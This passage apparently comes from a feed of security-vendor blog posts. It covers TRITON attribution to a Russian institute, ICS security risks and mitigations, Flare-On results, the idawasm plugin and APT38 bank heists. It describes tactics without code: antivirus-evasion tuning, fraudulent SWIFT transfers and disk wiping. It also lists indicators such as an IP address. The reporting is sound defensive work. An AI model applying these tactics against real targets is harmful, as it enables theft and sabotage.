  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.

While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.

Detail

Malware Testing Activity Suggests Links between TEMP.Veles and CNIIHM

During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment. Some of these same tools, identified by hash, were evaluated in a malware testing environment by a single user.

Malware Testing Environment Tied to TEMP.Veles

We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.

  • At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.
    • Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.
    • TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Soon after, the customized utility was again evaluated in the malware testing environment. The following day, TEMP.Veles again tried the utility on a compromised system.
  • The user has been active in the malware testing environment since at least 2013, testing customized versions of multiple open-source frameworks, including Metasploit, Cobalt Strike, PowerSploit, and other projects. The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.
  • Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.

Testing, Malware Artifacts, and Malicious Activity Suggests Tie to CNIIHM

Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM.

  • A PDB path contained in a tested file contained a string that appears to be a unique handle or user name. This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.
    • The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).
    • According to a now-defunct social media profile, the same individual was a professor at CNIIHM, which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow.
    • Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.
  • Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM.
    • This IP address has been used to monitor open-source coverage of TRITON, suggesting that unknown subjects operating from this network have an interest in TEMP.Veles-related activities.
    • It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.
    • The IP address has been tied to additional malicious activity in support of the TRITON intrusion.
  • Multiple files have Cyrillic names and artifacts.


Figure 1: Heatmap of TRITON attacker operating hours, represented in UTC time

Behavior Patterns Consistent with Moscow Time Zone

Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.

  • We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network. These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1), supporting a proximity to Moscow.


Figure 2: Modified service config

  • Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.
    • A ZIP archive recovered during our investigations, schtasks.zip, contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definition for a masquerading service, ‘ProgramDataUpdater.’
    • The malicious installation version has a task name and description in English, while the clean uninstall version has a task name and description in Cyrillic. The timeline of modification dates within the ZIP also suggests the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).


Figure 3: Central Research Institute of Chemistry and Mechanics (CNIIHM) (Google Maps)

CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations

While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool. We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.

  • CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:
    • The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.
    • The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment. It also researches methods for enabling enterprise safety in emergency situations.
  • CNIIHM officially collaborates with other national technology and development organizations, including:
    • The Moscow Institute of Physics and Technology (PsyTech), which specializes in applied physics, computing science, chemistry, and biology.
    • The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF). Some of its main areas of interest include nuclear physics, computer science and instrumentation, robotics and engineering, and electrical engineering, among others.
    • The Federal Service for Technical and Export Control (FTEC) which is responsible for export control, intellectual property, and protecting confidential information.
    • The Russian Academy of Missile and Artillery Sciences (PAPAH) which specializes in research and development for strengthening Russia’s defense industrial complex.
  • Information from a Russian recruitment website, linked to CNIIHM’s official domain, indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control, and the creation of new information technologies (Figure 4).


Figure 4: CNIIHM website homepage

Primary Alternative Explanation Unlikely

Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.

  • In this scenario, one or more persons – likely including at least one CNIIHM employee, based on the moniker discussed above – would have had to conduct extensive, high-risk malware development and intrusion activity from CNIIHM’s address space without CNIIHM’s knowledge and approval over multiple years.
  • CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity. TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.

ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic
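
As a simplified illustration of how such a cross-reference works, a risk rating can be implemented as a lookup of exploitability against impact. The axis labels and cell values below are generic placeholders, not Mandiant's actual scale.

# Simplified illustration of cross-referencing exploitability and impact.
# Axis labels and cell values are generic placeholders, not Mandiant's scale.
RISK_MATRIX = {
    # outer key: exploitability; inner key: impact
    "low":    {"low": "low",    "medium": "low",    "high": "medium"},
    "medium": {"low": "low",    "medium": "medium", "high": "high"},
    "high":   {"low": "medium", "medium": "high",   "high": "critical"},
}

def rate(exploitability, impact):
    """Return the risk rating for a finding."""
    return RISK_MATRIX[exploitability][impact]

print(rate("high", "high"))  # -> "critical"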

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated of high or critical risk. This means they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would have been enough to stop threat actors from targeting an organization's systems, or at least make it significantly more difficult. The implications are vast, because specialized malware or actors targeting infrastructure would likely look for these flaws first and exploit them throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy that includes procedures to implement patches and updates on key assets. More information is provided in the National Institute of Standards and Technology (NIST) Guide to Industrial Control Systems (ICS) Security, NIST SP 800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.
Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.
Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.


Figure 3: Reference architecture for segmentation of enterprise and control system networks

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring

We identified a lack of network security monitoring, intrusion detection, and intrusion prevention in organizations, including missing endpoint malware protection, unused ports left active, and limited visibility into ICS networks. We recommend the following best practices:

  • Define and implement a comprehensive network security monitoring strategy at the ICS level as part of an overarching ICS security program, paying special attention to network segments where external connectivity occurs.
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host- or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that provides detection and prevention for malware and malicious activities without relying on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.

Misconfigurations in Firewall Rules

We identified weak firewall rules, including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions that allow access to administrative services, and missing console connection timeouts. We recommend the following best practices for secure firewall configuration (a minimal automated rule-review sketch follows the list):

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
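As referenced above, the following is a minimal Python sketch of how several of these checks could be automated against an exported rule list. The rule format and field names are illustrative assumptions, not the syntax of any particular firewall product.

```python
# Minimal rule-review sketch for the practices above; fields are assumptions.
RULES = [
    {"name": "allow-hist", "src": "10.1.1.5", "dst": "10.2.0.10", "proto": "tcp",
     "port": "443", "action": "allow"},
    {"name": "mgmt-any", "src": "any", "dst": "any", "proto": "any",
     "port": "any", "action": "default"},
]

def review(rule):
    """Return a list of findings for a single firewall rule."""
    findings = []
    if rule["src"] == "any" and rule["dst"] == "any":
        findings.append("ANY-ANY rule: restrict to specific source/destination IPs")
    if rule["proto"] == "any":
        findings.append("no protocol specified: pin the rule to a specific protocol")
    if rule["port"] == "any":
        findings.append("no port specified: restrict to required ports only")
    if rule["action"] not in ("allow", "drop"):
        findings.append("rule relies on a default action: make the action explicit")
    return findings

for r in RULES:
    for finding in review(r):
        print(f"{r['name']}: {finding}")
```
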
Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We strongly recommend that organizations implement ICS security programs that prioritize the following recommendations:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. While the trends observed in this research align with risk areas commonly discussed in security conference talks and media reports, this blog post draws from dozens of on-site assessments, which gives the findings real-world validity.

Our findings indicate that at least one third of the critical and high security risks in ICS environments are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners who must oversee the daily operation of thousands of assets in complex industrial environments. It is also worth highlighting that some of the most common risks we identified could be mitigated with security best practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or want to request Mandiant services, please visit our website.

2018 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the fifth annual Flare-On Challenge. The numbers are in and we can safely say that this was by far the most difficult challenge we’ve ever hosted. We plan to reduce the difficulty next year, so it may be that the 114 people who solved this year’s challenge solved not only the most difficult Flare-On to date, but the most difficult Flare-On there ever will be. The prize for these amazing and dedicated Reverse Engineers is a magic decoder buckle and coin insert. It can be used to decode and encode secret messages using a pre-shared key. It is based on a crypto system known as a Diana Cipher. They will be shipping soon.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. Minesweeper Championship Registration: Nick Harbour (@nickharbour)
  2. Ultimate Minesweeper: Nick Harbour (@nickharbour)
  3. FLEGGO: Moritz Raabe
  4. binstall: Tyler Dean the Malware Machine
  5. Web 2.0: William Ballenthin (@williballenthin)
  6. Magic: Sebastian Vogl
  7. WOW: Ryan Warns
  8. Doogie Hacker: Matt Williams (@0xmwilliams)
  9. leet editr: Michael Bailey
  10. golf: Ryan Warns
  11. malware skillz: Jay Smith
  12. Suspicious Floppy Disk: Nick Harbour (@nickharbour)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 4,893 registered players and 3,374 players finishing at least one challenge. This year also had the fewest finishers ever, with 114.

The U.S. continues to slip further down the ranking in terms of finishers by country. China takes the lead in overall finishers and Singapore is the undisputed champion of per capita finishers with more than one finisher per million people.

All the binaries from this year’s challenge are now posted on the Flare-On website. And here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

FLARE Script Series: Reverse Engineering WebAssembly Modules Using the idawasm IDA Pro Plugin

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce idawasm, an IDA Pro plugin that provides loader and processor modules for WebAssembly modules. idawasm works on all operating systems supported by IDA Pro, and can be obtained from the idawasm GitHub project.

Motivation

You may have competed in this year’s Flare-On challenge and reached the fifth level only to discover a new file format: a WebAssembly (“wasm”) module. In order to proceed, you had to reverse engineer the key check logic contained in this binary file for the WebAssembly stack-based virtual machine. But first, you probably learned a bit about wasm:

"Wasm is designed as a portable target for compilation of high-level languages like C/C++/Rust, enabling deployment on the web for client and server applications.
The Wasm stack machine is designed to be encoded in a size- and load-time-efficient binary format. WebAssembly aims to execute at native speed by taking advantage of common hardware capabilities available on a wide range of platforms."

via: WebAssembly

While WebAssembly is a fairly new standard, some tools for analysis already exist:

  • The WebAssembly Binary Toolkit provides the command line tool wasm2wat that translates a .wasm file into the human-readable .wat format, as well as a basic decompiler called wasm2c.
  • The web-based WebAssembly Studio IDE exposes features for extracting .wasm files into interesting formats, including translations to x86-64 produced by the Firefox SpiderMonkey JIT engine.
  • Radare2 can disassemble instructions, though it doesn’t reconstruct control flow graphs just yet.

Unfortunately, few of these tools are interactive or familiar to us. If we could analyze .wasm files in IDA Pro, like we do with .exe and .so files, then we might be better prepared for malware distributed as WebAssembly.

The idawasm IDA Pro plugin is a loader and processor module that enables analysts to review WebAssembly modules using a familiar interface. Let’s take a peek at some of its major features.

Whirlwind Tour of idawasm

Once you’ve installed idawasm, you can load .wasm files into IDA Pro. The "Load a new file" dialog will indicate when the loader module recognizes a WebAssembly module. Currently, the plugin supports the MVP (version 1) release of WebAssembly, as shown in Figure 1.


Figure 1: IDA Pro loading a WebAssembly module

The processor module then gets to work and reconstructs the control flow, which enables IDA’s graph mode. This makes it easy to identify high-level control constructs, such as if statements and while loops. On the FLARE team, we’ve found that when a C program is compiled for WebAssembly, the resulting control flow graphs mirror those of an x86 compilation target. Although the specific instructions differ, the techniques and intuitions we’ve learned for x86 apply to wasm as well. Note how easy it is to identify the pair of if statements in Figure 2.


Figure 2: Control flow graph of WebAssembly instructions

In addition to control flow, the processor module parses and renders function names and types using metadata embedded with .wasm files. It also extracts cross-references to global variables, enabling an analyst to “List cross-references” and find code that manipulates interesting values. Of course, all of the elements that idawasm parses can be interactively renamed and commented. Therefore, you can record knowledge about WebAssembly malware samples in .idb files and share them with other analysts.

For example, Figure 3 shows how an analyst has renamed local variables and added comments that explain how the function frame is manipulated during a function prologue.


Figure 3: Annotated WebAssembly in IDA Pro

When the idawasm processor detects that a WebAssembly module was compiled by LLVM, it enables enhanced analysis. LLVM uses primitives provided by the WebAssembly specification to implement a function frame stack in global memory used for mutable function-local variables. In the function prologue, the first few instructions allocate the frame on this global stack, while the epilogue cleans it up prior to return. idawasm automatically finds references to the global frame stack pointer and reconstructs the frame layout of each function. Using this information, the processor updates IDA’s stack frame structures and marks immediate constants as offsets into these structures. This means that many more instruction operands are actually symbols that can be commented and renamed, as shown in Figure 4.


Figure 4: Automated reconstruction of function frame

By convention, WebAssembly compilers emit instructions that reference variables in Static Single Assignment (SSA) form. This benefits browser engines, because code that is already in SSA form is easier to import into analysis systems such as optimizers and JIT engines. The use of SSA form is why even the simplest functions have dozens or hundreds of local variables.

For a human analyst, however, SSA form is tedious to analyze, since we must trace operations across many separate local variables. To help us out, idawasm includes a WebAssembly emulator that can track instructions at a symbolic level. This enables us to collapse a sequence of simple-but-related instructions into a single complex expression.

To use it, we select a region of instructions within a single basic block and run the wasm_emu.py script. The script emulates the instructions, simplifies their effects, and renders the effect to global variables, locals, memory, and the stack. Figure 5 shows how a function’s prologue is simplified to a single global variable update:


Figure 5: wasm_emu.py showing the effects of function frame allocation

When there are many arithmetic operations, wasm_emu.py often simplifies them into a single meaningful expression. For example, Figure 6 shows how 32 instructions boil down to a single XOR across two input bytes:


Figure 6: wasm_emu.py simplifying many instructions to a complex instruction
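To give a feel for this style of symbolic simplification, here is a minimal, self-contained Python sketch that folds a short sequence of stack-machine operations into a single expression. It illustrates the general idea only and is not taken from wasm_emu.py's implementation; the instruction names and the prologue sequence are simplified assumptions.

```python
# Illustrative symbolic evaluator for a tiny stack machine. Each instruction
# is (opcode, operand); the evaluator tracks expressions instead of values.
def symbolic_eval(instructions):
    stack = []
    for op, arg in instructions:
        if op == "local.get":            # push a named local as a symbol
            stack.append(arg)
        elif op == "i32.const":          # push a literal constant
            stack.append(str(arg))
        elif op in ("i32.add", "i32.sub", "i32.xor"):
            rhs, lhs = stack.pop(), stack.pop()
            sign = {"i32.add": "+", "i32.sub": "-", "i32.xor": "^"}[op]
            stack.append(f"({lhs} {sign} {rhs})")
        elif op == "local.set":          # name the folded expression
            return f"{arg} = {stack.pop()}"
    return stack[-1] if stack else ""

# A frame-allocation prologue similar in spirit to what LLVM emits.
prologue = [
    ("local.get", "global_stack_ptr"),
    ("i32.const", 16),
    ("i32.sub", None),
    ("local.set", "frame_ptr"),
]
print(symbolic_eval(prologue))   # frame_ptr = (global_stack_ptr - 16)
```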

Conclusion

idawasm is an IDA Pro plugin that enables support for WebAssembly modules via a loader and processor. This lets analysts use a familiar interface to reverse engineer .wasm files and share their work with others. The wasm_emu.py script can also be helpful for understanding the effects of long streams of WebAssembly instructions. Now dealing with this new file format and architecture won’t be as scary, so head on over to the idawasm GitHub project to start using it!

APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates that these are disparate operations against different targets, relying on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed the recruitment and cooperation of individuals in-country to support the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and the coordination necessary among the multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

Increased Use of a Delphi Packer to Evade Malware Classification

Introduction

The concept of "packing" or "crypting" a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware "FUD" or "Fully Undetectable" by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

Delphi Code to the Rescue

The samples we inspected carried the Delphi signature (Figure 1), and analysis with IDR (Interactive Delphi Reconstructor) confirmed that they were consistent with Delphi code constructs.


Figure 1: Delphi signature in sample

The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application "look legit" during dynamic analysis. Figure 2 shows the forum post of an actor discussing this technique.


Figure 2: Underground forum post of an actor discussing technique

Distribution Campaigns

We have observed many spam campaigns with different themes that drop payloads packed using this packer.

One example is a typical SWIFT transfer-themed spam email that carries a document file as an attachment (hash: 71cd5df89e3936bb39790010d6d52a2d), which leverages malicious macros to drop the payload. The spam email is shown in Figure 3.


Figure 3: Spam example 1

